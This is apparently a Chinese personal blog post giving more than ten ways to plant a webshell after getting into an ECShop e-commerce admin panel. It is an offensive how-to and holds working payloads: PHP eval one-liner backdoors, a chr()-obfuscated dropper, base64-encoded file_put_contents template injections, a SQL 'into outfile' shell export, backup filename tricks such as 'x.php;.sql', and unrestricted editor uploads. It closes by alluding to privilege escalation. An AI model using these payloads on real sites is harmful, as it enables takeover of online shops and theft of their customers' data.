注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

 
 
 
 
 

日志

 
 

【ECshop】ecshop后台拿shell十二种方法  

2014-08-11 20:30:55|  分类: CMS |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

方法一、

进后台-订单管理-订单打印-选择插入/编辑图片,然后弹出一个对话框,选择链接菜单-浏览服务器,左上角上传类型选择media,然后就可以直接上传php小马。文件路径是:/images/upload/Media/xx.php

方法二、

后台-订单管理-订单打印-选择源代码编辑-在最后面插入代码-保存-返回订单列表,随意选择一个订单打印,返回OK,生成一句话成功-在根目录生成了一个null.php,一句话密码:usb

代码:

<?php $filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112);
$filec=chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr
(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(117).chr(115).chr(98).chr(93).chr(41).chr(59).chr
(63).chr(62); $a=chr(119); $fp=@fopen($filen,$a); $msg=@fwrite($fp,$filec); if($msg) echo chr(79).chr
(75).chr(33); @fclose($fp); ?>

方法三、

  • 进后台
  • 选择模版管理 - 语言项编辑
  • 搜索“用户信息” 在用户信息后面加上:

${${fputs(fopen(base64_decode(cGNzbGkucGhw),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbcGNzbGldKT8+))}}

  • 然后确认修改, 访问根目录下user.php。在同目录下生成pcsli.php 一句话密码为:pcsli


--------------------------------------------------------------------------------------------------------------------------------------------------最近想弄个ecshop做销售。装好ecshop V2.7.2版本之后,测试后台拿shell。

本人整理给自己看的,大家飘过就好。BY:黑猫

ecshop后台拿shell 个人总结七种方法

一、

系统==>数据库管理==>sql查询(可爆出物理路径):

==============创建表失败,导不出shell======================

show databases;
use 数据库名;
create a(cmd text not null);
insert into a(cmd) values(‘<?php eval($_POST[cmd]);?>’);
select cmd from a into outfile ‘导出路径’;
drop table if exists a;

==================创建表失败,导不出shell===================

二、

前台留个言,内容是我们的一句话木马:<?php eval($_POST[cmd]);?>

接着在后台系统==>数据库管理==>数据备份==>选择自定义备份,选择ecs_feedback这张表(存放留言的表)

备份文件名:x.php;.sql (x.php.sql形式出错,菜刀链接不成功)

然后菜刀链接成功

http://www.webshell.cc/data/sqldata/x.php;.sql

三、

1、添加会员,会员名称插入插入一句话 :<?php eval($_POST[cmd]);?> ,其他随便填写。
2、系统==>数据库管理==>数据备份—自定义备份—选“XXX_users”
(其中XXX因各站而异,是数据前缀)
3、备份文件名为mm.php;.sql
4、一句话客户端连接mm.php;.sql,地址一般为 http://www.webshell.cc/data/sqldata/mm.php;.sql

四、

模板管理==>库项目管理==>选择myship.lbi 配送方式。

在文件内容最后面加入一句话代码:<?php eval($_POST[cmd]);?>

菜刀链接http://www.webshell.cc/myship.php 成功。

说明:有些服务器过滤了eval 导致失败。

五、

http://www.webshell.cc/includes/fckeditor/editor/filemanager/connectors/test.html

代码省略
对Media 没有任何限制. 直接 Type=Media 上传 你的 解密webshell
访问路径为

http://www.webshell.cc/images/upload/Media/xxx.php

六、

上传txt 并且没有过滤任何函数.
于是运用到了php的文件操作…
<script language=”php”>$file = file_get_contents(“C:/Inetpub/wwwroot/ecshop/data/Article/1286344719152816497.txt”);
if($file){
$file = “C:/Inetpub/wwwroot/ecshop/data/Article/1286344719152816497.txt”;
$newfile = ‘C:/Inetpub/wwwroot/ecshop/data/distant.php;a.txt’;
copy($file,$newfile);
}</script>

将以上代码插入库项目管理中的myship.ini
打开http://www.webshell.cc/myship.php
即在http://www.webshell.cc/data/目录下生成distant.php;a.txt
菜刀连接之…搞定..

七、

进入后台-系统设置-Flash播放器管理- 直接上传x.php

ecshop V2.7.2 版本已经没有这个选项 ,所以这个已经失效。

本站内容均为原创,转载请务必保留署名与链接!
ecshop后台拿shell 个人总结七种方法:http://www.webshell.cc/1625.html


入后台后,在menu里的 模板管理>库项目管理 , 然后选择 myship.lbi,直接写入一句话,地址xxx.com/myship.php大刀连接,上传大马….接下来…好了不说了 ,提权..你懂得!

不过如上上述方法失败了,那就是版本更新了,其他的老办法(flash任意上传,slq导出等等)也都不好使了,用这个高大上的方法把,后台-邮件模版-编辑,把内容修改成

{$user_name’];file_put_contents(base64_decode(‘Li4vdGVtcC9zaGVsbC5waHA=’),base64_decode(‘PD9waHAgQGV2YWwoJF9QT1NUWycyMDcnXSk7Pz4=’));echo $var[‘$user_name}

</p>
<p>{$user_name}您好!<br />
<br />
您已经进行了密码重置的操作,请点击以下链接(或者复制到您的浏览器):<br />
<br />
<a target=”_blank” href=”{$reset_email}”>{$reset_email}</a><br />
<br />
以确认您的新密码重置操作!<br />
<br />
{$shop_name}<br />
{$send_date}</p>

 

点击确定,在后台登陆地方点忘记密码,输入用户和邮箱 (这个在后台随便找个用户就OK)提交就会在temp下生成shell.php一句话木马,密码是207

Li4vdGVtcC9zaGVsbC5waHA= 用base64解密就是 ../temp/shell.php
  评论这张
 
阅读(167)| 评论(0)
推荐

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017